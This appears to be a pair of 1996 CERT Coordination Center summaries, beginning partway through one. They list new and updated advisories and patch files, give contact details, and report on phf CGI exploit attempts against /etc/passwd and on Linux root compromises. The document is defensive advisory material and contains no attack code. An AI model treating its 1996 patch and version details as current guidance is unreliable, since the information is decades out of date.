ftp://info.cert.org/pub/latest_sw_versions
swatch
ftp://info.cert.org/pub/tech_tips
UNIX_configuration_guidelines These replace the security_info file
intruder_detection_checklist (the CERT Security Checklist).
security_tools
ftp://info.cert.org/pub/vendors/
hp/HPSBUX9607-033 Added Hewlett-Packard bulletin about a
security vulnerability in expreserve.
* Updated Files
ftp://info.cert.org/pub/cert_advisories/
CA-96.02.bind In the appendix, updated Sun
Microsystems, Inc. patch information.
In section I, added information about
the next release of bind and the
IsValid program.
CA-96.08.pcnfsd Updated URL for IBM Corporation,
updated Hewlett-Packard Company patch
information, and modified NEC
Corporation patch information.
CA-96.09.rpc.statd Updated URL for IBM Corporation,
removed a workaround for SunOS 4.x
(patches now available), updated
information on Hewlett-Packard
Company, and added patch information
for NEC Corporation. Also updated
opening paragraph.
CA-96.14.rdist_vul In Appendix A, added note under
Silicon Graphics, Inc. about using the
find command, updated the
Hewlett-Packard Company entry, added
information about Digital Equipment
Corporation, and added an IBM
Corporation URL.
CA-96.15.Solaris_KCMS_vul In Introduction, added information
about Solaris 2.5.1.
CA-96.18.fm_fls Added vendor information to Appendix A.
Added Section III.B, which provides
another possible solution to the
problem.
CA-96.19.expreserve In Appendix A, added information for
Silicon Graphics Inc. and Sun
Microsystems, Inc.
CA-96.20.sendmail_vul Added to Sec. III.B instructions on
configuring sendmail at sites that use
'&' in the gecos filed of /etc/passwd.
Added to Sec. III.C a note on uid for
"mailnull" user. In the appendix, added
information from FreeBSD, Inc. and
Berkeley Software Design, Inc. (BSDI).
ftp://info.cert.org/pub/FIRST
first-contacts
ftp://info.cert.org/pub/latest_sw_versions
rdist-patch-status Updated information for
Hewlett-Packard Company and NeXT
Software, Inc. information. Updated
rdist version information in
Section II.G.
sendmail
ftp://info.cert.org/pub/tech_tips
root_compromise
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email cert@cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request@cert.org
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
http://www.cert.org/
ftp://info.cert.org/pub/
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.
CERT is a service mark of Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMkhCfHVP+x0t4w7BAQFR5gQAtYvbKLJAbTzfRizblM9mbl/4oLfnsqdQ
HcX8KKDNAtVd2DWKGEsq7U7v9w8KyzDtVpRFba8VSsVmpzixzxnbZSifwyfkcuX9
x2xbQ1SVWBjep399HkbYtS0Y3C0RdCo9p/uxdB5/GkZqD3NMdPoBvFf+j/H6376w
tDcheNKNobk=
=DZgd
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
CERT(sm) Summary CS-96.6
November 26, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
Incident Response Team. The summary includes pointers to sources of
information for dealing with the problems. We also list new or updated
files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
- ----------------------------------------------------------------------------
Recent Activity
- ---------------
Since the September CERT Summary, we have noticed these continuing trends
in incidents reported to us.
1. cgi-bin/phf Exploits
We continue to see frequent reports of attempts to exploit the vulnerability
in the CGI example program "phf". The phf program, which is installed by
default with several implementations of httpd servers, contains a weakness
that can allow intruders to execute arbitrary commands on the server. The
most common attack involves an attempt to retrieve the httpd server's
/etc/passwd file, and sample scripts for exploiting this vulnerability in phf
have been widely posted on the Internet.
While we are encouraged to see that the majority of the recently reported
attacks have failed (because the attacked sites had already removed the phf
program), the steady reports of continuing attacks indicate that these phf
exploits are still being widely attempted.
For more information about this vulnerability, see
ftp://info.cert.org/pub/cert_advisories/CA-96.06.cgi_example_code
For related information about protecting your password files, please see
ftp://info.cert.org/pub/tech_tips/passwd_file_protection
2. Continuing Linux Exploits
We continue to see incidents in which Linux machines have been the victims
of root compromises. In many of these incidents, the compromised systems
were unpatched or misconfigured, and the intruders exploited well-known
vulnerabilities for which CERT advisories have been published.
If you are running Linux, we strongly urge you to keep current with all
security patches and workarounds. If your system has been root compromised,
we also recommend that you review
ftp://info.cert.org/pub/tech_tips/root_compromise
Further, you may want to monitor the Linux newsgroups and mailing lists for
security patches and workarounds. More information can be found at
http://bach.cis.temple.edu/linux/linux-security/
- ----------------------------------
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (September 24,
1996).
* New Additions
ftp://info.cert.org/pub/cert_advisories/
CA-96.22.bash_vuls Addresses two problems with the GNU
Project's Bourne Again SHell (bash):
one in yy_string_get() and one in
yy_readline_get().
CA-96.23.workman_vul Describes a vulnerability in the
WorkMan compact disc-playing program
that affects UNIX System V Release 4.0
and derivatives and Linux systems.
CA-96.24.sendmail.daemon.mode Addresses a vulnerability that allows
intruders to gain root
privileges. Includes patch and upgrade
information.
ftp://info.cert.org/pub/cert_bulletins/
VB-96.17.linux Linux Security FAQ Update from
Alexander Yuriev. Includes information
about a mount/umount vulnerability.
VB-96.18.sun Addresses vulnerabilities in the libc
and libnsl libraries of Solaris 2.5
(SunOS 5.5) and Solaris 2.5.1
(SunOS 5.5.1) from Sun Microsystems,
Inc. Includes patch information.
ftp://info.cert.org/pub/latest_sw_versions/
bash Added information on bash 1.14.7.
sendmail Added information on sendmail 8.8.3.
* Updated Files
ftp://info.cert.org/pub/
Sysadmin_Tutorial.announcement Added date of next course offering.
ftp://info.cert.org/pub/cert_advisories/
CA-94:01.ongoing.network.monitoring.attacks
Clarified introductory
information. Added a pointer to the
CERT tech tip on root compromises.
CA-95:02.binmail.vulnerabilities Removed Appendices B & C, which
contained outdated information. In
section B, added information that
mail.local is now part of
sendmail. Added a pointer to sendmail.
CA-96.09.rpc.statd Updated information from Silicon
Graphics Inc.
CA-96.20.sendmail_vul Added a pointer to CA-96.24.
CA-96.21.tcp_syn_flooding Revised second paragraph of
introduction for clarity. Added new
information for Silicon Graphics
Inc. (SGI), Berkeley Software Design,
Inc. (BSDI), Sun Microsystems, Inc.
Revised appendix information on
reserved private network
numbers. Added pointer to information
in ftp://info.cert.org/pub/vendors.
CA-96.22.bash_vuls Added Appendix A containing
information from IBM Corporation,
LINUX, and Silicon Graphics,
Inc. (SGI). Removed patch for problem
in yy_readline_get, as the problem
described for yy_string_get is not
exploitable for yy_readline_get.
ftp://info.cert.org/pub/tools/mail.local/
README Added information that mail.local is
now a part of sendmail. Added a
pointer to sendmail.
ftp://info.cert.org/pub/tools/sendmail/
sendmail.8.8.3.patch
sendmail.8.8.3.tar.Z
sendmail.8.8.3.tar.gz
sendmail.8.8.3.tar.sig
ftp://info.cert.org/pub/vendors/hp/
HP.contact_info Replaced instructions for subscribing
by email with the new URLs people must
use.
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email cert@cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request@cert.org
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
http://www.cert.org/
ftp://info.cert.org/pub/
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.
CERT is a service mark of Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMpoitXVP+x0t4w7BAQEp1gP/XK7WsKsoplL4F9YdMi9CyHCd/H1Qh3Nm
oyJDD9O19EPsCjeuFgBX5bGWb26L1MeuuCyEhV/5Z9Vf2R9wrPcOq3l+UeVjV/0t
SDwp/Y2R4uP+hdCzkDKk5Ryuzoxq3xj4TD0GNv8XRShQbUR2u05zFbzbyiH+ONh8
C7E1HKBP03M=
=nrOY
-----END PGP SIGNATURE-----